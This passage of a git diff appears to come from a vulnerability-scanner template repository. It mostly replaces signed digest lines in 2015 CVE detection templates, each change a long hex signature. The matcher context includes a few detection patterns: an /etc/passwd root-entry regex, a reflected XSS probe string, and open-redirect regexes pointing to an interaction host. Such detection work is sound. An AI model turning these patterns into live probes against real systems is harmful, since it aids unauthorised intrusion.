4a0a00473045022100e2c30dafcfaf747bbc1516a801b6f0c0418d72acb0e771939826193d9a93291502204f311d75a2cb0ae12aef112c90a354bd53451d367c99671aed2bd4bd2c4f8621:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index e127593c5c..92169aca0b 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f1f475fa4f52e36af22f8c1fd174fd227db3220068dd25993f009d04ecac0700220473d7e9f0bccadbcb97eaac77b5bde7a39bf0a25882afc8889ee9f4996cc1805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index de0b9ca407..5669854804 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0a87139a45778ff044c46bad3780d8ac438f8a75ad5be9dae57584656afba3a022100eac3592c45cd386f902a94e07a5c7915903a6e1bdfd7b5d8a8bdf2af67fbaa38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 966f3227db..4ed01ed159 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008d7b2c5ed672ef985ed540bfcbc7c4a97cf1f627eacd0da9ebe8a57297962be402210097c2112afd61ccd9846d28ee66036895ff0f555e75161377c5269319f214284e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 62de6b57dd..0a62a16182 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fcfcc25ab96536af2b8e2b1cae82b3f057a0f60ebf41c8d3f6f4bd029879ef302206acf0ff4e2fd19087e94cb9beb1a8add10fabd4a24597cdf7bd81207a40ae383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index 0251c0c926..a3614de746 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -48,4 +48,4 @@ http: part: header words: - "Microsoft" -# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f63535ff8dd3b0fc92073a3509d0a0fd7a6b3c9d6ed1578186ee18018a502f600220255af0daf50f7a5e4cfb146a9ace9e26de91185c1c8a07724820caba72ac8ac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 237ab86213..4023c545ce 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d3f317fe5b4820f58a1472f22755f24ea4913e7d04c71281acdc16a6ea4dcf102210096e6b0e040652e05835ce91e53d560d472493b09560c17536225a2f257146642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 07927481dd..cf6695e912 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200083eadbbf1f9e019bcd0a93d62e9285ceb5146a095784729a2b8f360e882060022100e7722c672319e299e2e4eda6bbf7ee1e8442c9c123f63aee02d34ad2ea776cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index cee184fae4..892a6b23ea 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b66032656a55663721d240362a3514462a90c3228a98ac576768f9833c27d2022070f821ea45564431e8bea158126f890008c77c8c569bd6a7047652639d07259e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 7c88c23a6d..797b5bbf5b 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ee6af0a974f33dcc7b5fe8f9f4cb703696f43a32588369a8fc83104b162ff3002206ff427f007fb430ad833f19fcc71c4523a959037201b4610e8a5848b66f97a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 34b19334ff..7e901fa40c 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 4172f02203..af2ccb1f13 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -56,4 +56,4 @@ http: - 'contains(body_2, "<script>+-+-1-+-+alert(document.domain)</script>")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dda7ff953b221b559dcea855c1c3673c49450581b89d2b7eb7941894951394fa022100cb6fb992be83baf795c00ba8f2d800eeb418a3a9033cff48b2064f725119f3f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index e106537f6f..d44fdec3f1 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210088a6906ad39a7b6d77f1bf0198de8fc5e3e1f59c7606690649f554952b8e71d5022100b42919235cda07c096a34dce69f2d8ff8b3e19d5f309acbac8bbea3e9140e5fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c5797951db4ec653663bb177b671ce6f66942165295490dbbdcea4c5d0c25f10022061fa0df6b51773e3afe345347fb3bb08f52f14b403d27433a203ae7e0393fd32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 6477f07092..7337ce8150 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082e020d9e8b2d5d7e7bef721183a3753d3d1f6e6d5edac73c48741770d80b66602205d8cf502e70a1a70092bcd7073f6e35af23efdbb2810f7f5d4def6c4926d45b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 4540b128f8..fee2ae86dc 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e258464980f4c82ff954b569b1571e3d4c3b8ddb3ee6b9a2fec1680b4fe1ffa022100c331064e024486730778150d8b5c22fe64d3cdb3a0956dd807a5170aee2769ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index 117fdd6353..8be9c0187c 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -54,4 +54,4 @@ http: - data-session-id= case-insensitive: true condition: or -# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020354b064be7c3002811f57d9842df15bde98e6b50ddf1dd51805c572f6e204602200d5345769babb2b707fd686e022f805cacbf8216fabc09786c56c79672c5f14e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index e6e73bdd4f..7687592703 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206b4169ea4037924ebdc00d3cc7130c430dcd5ec43759ee09a9f082345b65f7dd022100c41635084e4f84a3e64265efc16c730e5b4725552238f864784bae130304e1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce84a33308ba91f840d72b0a7827eeac30ca40dc21c36c701fc5dbaa6f157a2b022100f31c7e0fdee69d860230c8851f1f3d5365c67282b42a537b80b3326e2c10b744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index 75a3533dfb..77fa62312e 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cdb12fbdd55efd4a36a417af3dd59a6c9ce9fd1847a88795418e2dc805b8f5a40220218f2336204c209621417f54d0af76c9753c78445a9415bdd511fe025e74aa0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index f1e8b0ce01..76052a00b2 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -51,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcd5207100a25aa6acd80942d2d62778a16671bd660cbca07d14fbd2f428866302203a50b15dd5bb3baa63c92c70557e4decd1922f775ba2d5723d9c48d52600cd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 3564b8856b..5e7c940520 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100858bd9184ab4903ccc7d5fa3c75fd32dc9262c548751d820e7c72d49c59bcc4e02204c3c23267a39aa31540f8ee763a21847dc7d465a33cbfb9763ac7562f8adbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 2b35be4787..d8b1138b67 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220030c360d8dfa5d3d6f2131143759e7b592d9e41b96f1343fcca8b5f2d2476b4402204573c142f5c7903e321c0f6d209366a1659d0b19d23feb8610d7aa104af4f7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index ea36b7cd0f..5b94f1ef77 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -67,4 +67,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and -# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022078ca2d70ae668cef1731fec1043351a5c346027f11a5db597e9f60a953f42a5a022100924427e22c3329c6e9badf1c9c69e97e8fca728ccfee6e73e656b4b388ab0df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 9b15f9d743..407f940693 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b05f415f11986e6b3ad650b585140749b2b8035d73f2931f6e78f4c5f6f5232b02203a635de3c9935dc598ec196c69eb432a53de2c3b9891cb839d776160f1d0fdf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac8404c129a23234cc232fc82c4a72092885e1a6beb927ec0013b546a0493efe02204382b75d9ad57c13691d86c89e4f7862f9ace0967a14b88e7c0fe98dd60f7fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index dcfea4e355..a2c129b6b9 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201a7b1f661191d5cf0cd3b6698c57549de62930e8b8b37f08e83b34383402682302202a841a227aba2b9fd4c73cf72d41a36ca80ce54068a4ff45c65ea18ea873b68e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 12ca3e511e..f36d3bc2fe 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4ef8441c6c0d53daadd541f0f21fab47fc4d77af6b930222621893db4913d940221008d246cc60163a5cf4f2bbc7bff089883b2b86e6c275b970bfd4654bad39d9194:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 13b7beca88..bb8fba9680 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0496c4fd3aca32d1a2d8344ea8556de9f811cc86996acd4e61d9751af0339fd022100addd126b0e674d7b130b42aa93991ee8b4cf9f989dcf57581901e4ae8c8856cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index cb35e3d581..d6232d2b3c 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b358a0733787a256d88b76615b87f1297c9438ed3ecb830ab1b792c58a1a954f022100b5fe98f745bc4c696d72f1499e5abb9ee02828c45f878a8d5ff4210f97726828:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index e4ec4623ba..cfd4bf8191 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bdf38a3e9f23744d2a793a19f5fdeadd16297d031cbfe68b899cb9960bc9730022100bd87559c0a83dbe87b065f7f381c804560fc2a151ebde23a9a969442df5bedcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 6490ab3b0e..d3859d8226 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3a9f2d041f2e75dd77d111180e573fa77581d495321d5b602b710375e9bab5802204832764c446a039e3d1b93621dab1eb423fe570fc6c226804f3c05bd6bd7b558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 4362111d4d..54e545481e 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205488f218bf2c3c7f54b39eb4a23b2b8168ef4c98f3be02378805ef5f6d92965c022100a55527149f23f2bf1990d33ec040e1260b8a1583966e4680161b9a31a65e5d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc89b026ca87cf13ed22d0c5f83b0877852bdffbcfced68e49ece56ac50a6c3d02210081447372c99d6593cace00c9ff9ced844310b75f90b508d792f5ab2e90785dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 46aa09eb58..b6c1463df4 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008bab1004e34f044c74689230de8f4d39ef776246196710ce3b9dc0485bb7b65022100a1b73bfc5f2610fc20d5b2d111a819fb675d8fc62d9c3411507de1aa1cbafe8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index efce4d7741..622cd844c2 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -43,4 +43,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100a76121fd34a701a623fe02d8de446a12a363ff654c9fa1639ad529008c43117a022100e533be8c3fc95b05cc0cc6b3128a8fd970c943c5846fc163dc941f2849144f4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a3b55b62d3630083acd3ff5ac07b40b36072cd0f19057206fc1c857c76d09100221009f3084a270873f40433bd307963f6139d6ec53c5e9dbcded90a7b58260331e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 4a2e6f00b8..55746ed8e2 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057ac21264c23de9dd6686f44744a59263f916311d44d55512d4a00d1a575799302204ffb90cb3c1c00d45cec8b57f7592fd62fa17665ec00217cdda0fba02c722464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 383609faa4..422a417664 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043bd184feb21ca8bc16b4fb7147c866de4ff696bfb2bdf5302e819afd88c3b6e022075249fac1e933dd96947e253c5e4c1713687f62804c8e9c259b81bcbe2efc03f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 76babb3ca9..f2bf1ff6ad 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206715646176dfaf881abea22a771b13d7191ddac25404b6da18043e32debb045a02206fc7d62fa1245bb84aa68f06446b12741e7c57561bc65de2c4b3992b421ad1b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 48ac5eaa85..c1fc09a7f9 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a004830460221009e8f50b85daa26e3fc8e68ec98b52d6c22a387e1dfa6ab6e91be8ce1b8508ab3022100ade33462a8ca04ef6ae72e63331f1d1880a4ba45f2ea2180ff659181ccbb5b57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4cb1accc1f6aa60e3abe2a12e593d2018453a73db8d49cfd30df1a5acba3fe202210098b526e82020fb8a4e0d9d4c50a5a3d986ec9ccb5fd2b6e693561b4b66ed3bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index 40f41a116d..af8e7b3406 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 